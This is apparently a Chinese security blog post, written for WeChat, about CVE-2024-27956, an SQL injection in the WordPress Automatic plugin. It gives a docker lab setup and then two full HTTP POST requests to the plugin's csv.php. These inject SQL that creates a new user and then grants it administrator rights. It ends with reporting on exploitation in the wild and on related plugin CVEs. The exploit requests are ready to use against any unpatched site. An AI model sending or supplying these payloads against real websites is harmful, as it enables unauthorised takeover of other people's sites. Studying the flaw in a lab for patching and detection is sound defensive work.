道一安全(本公众号)的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
由于变量“q”直接传递到$wpdb->get_results()调用中,因此可以直接执行SQL命令。
暂无
WordPress Automatic Plugin < 3.92.1
docker环境:
将下面代码保存至wp.yml
version: '3.1'services:wordpress:image: wordpressrestart: alwaysports:8080:80environment:WORDPRESS_DB_HOST: dbWORDPRESS_DB_USER: exampleuserWORDPRESS_DB_PASSWORD: examplepassWORDPRESS_DB_NAME: exampledbvolumes:wordpress:/var/www/htmldb:image: mysql:8.0restart: alwaysenvironment:MYSQL_DATABASE: exampledbMYSQL_USER: exampleuserMYSQL_PASSWORD: examplepassMYSQL_RANDOM_ROOT_PASSWORD: '1'volumes:db:/var/lib/mysqlvolumes:wordpress:db:
执行 docker-compose -f wp.yml up
插件下载地址:https://github.com/truonghuuphuc/CVE-2024-27956/blob/main/wp-automatic.zip
在后台插件安装处按照即可
上传后点击 Activate Plugin 按照插件
本地安装:
用phpstudy搭建一个WordPress然后按照带有漏洞的插件
POC:
1
POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1Host: 192.168.172.129:8080Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://192.168.172.129:8080/wp-admin/plugins.php?plugin_status=all&paged=1&sAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 217q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', '[email protected]', NOW(), 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28
2
POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1Host: 192.168.172.129:8080Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://192.168.172.129:8080/wp-admin/plugins.php?plugin_status=all&paged=1&sAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 199q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (6, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'), (6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c
刚刚插入的管理账号
群内不定期更新各种POC
更多介绍:
威胁行为者正试图积极利用WordPress ValvePress自动插件中的一个关键安全漏洞,该漏洞可能允许网站接管。
该漏洞编号为CVE-2024-27956,其CVSS评分为9.9(最高为10)。该漏洞影响3.92.0之前所有版本的插件。该问题已在2024年2月27日发布的3.92.1版本中得到解决,尽管发布说明中没有提到它。
WPScan 在本周的警报中表示:“这种漏洞是一种 SQL 注入 (SQLi) 缺陷,它构成了严重的威胁,因为攻击者可以利用它未经授权访问网站、创建管理员级别的用户帐户、上传恶意文件,并可能完全控制受影响的网站。”。
根据Automattic旗下的公司,这个问题源于插件的用户身份验证机制,通过巧尽心思构建的请求,可以轻易绕过该机制,对数据库执行任意SQL查询。
在迄今为止观察到的攻击中,CVE-224-27956被用于未经授权的数据库查询,并在易受攻击的WordPress网站上创建新的管理员帐户(例如,以“xtw”开头的名称),然后可以利用这些帐户进行后续的攻击后操作。
这包括安装插件,使上传文件或编辑代码成为可能,表明试图将受感染的站点重新调整为阶段。
WPScan说:“一旦WordPress网站遭到破坏,攻击者就会通过创建后门和混淆代码来确保其访问的寿命。”。“为了逃避检测和维护访问,攻击者还可能重命名易受攻击的WP-Automatic文件,使网站所有者或安全工具很难识别或阻止该问题。”
有问题的文件是“/wp‑content/plugins/wp‑automatic/inc/csv.php”,它被重命名为类似于“/wp-content/plungins/wp−automatical/inc/csv65f82ab408b3.php”的文件
也就是说,威胁行为者这样做可能是为了防止其他攻击者利用已经在他们控制下的网站。
CVE-224-27956由WordPress安全公司Patchstack于2024年3月13日公开披露。自那时以来,在野外发现了550多万次将该漏洞武器化的攻击企图。
漏洞披露时,如Icegram Express(CVE-2024-2876,CVSS评分:9.8)、Forminator(CVE-2024-28890,CVSS评分:9.8)和用户注册(CVE-2024-2417,CVSS评分:8.8)等插件中发现了严重的漏洞,这些漏洞可用于从数据库中提取密码哈希等敏感数据、上传任意文件和授予身份验证器用户管理员权限。
Patchstack还警告说,Poll Maker插件(CVE-2024-32514,CVSS评分:9.9)存在一个未修补的问题,该问题允许经过身份验证的攻击者(具有订阅者级别或更高级别的访问权限)在受影响的站点服务器上上传任意文件,从而导致远程代码执行。
原文始发于微信公众号(道一安全):CVE-2024-27956 WordPress Automatic SQL注入漏洞 可添加后台账号
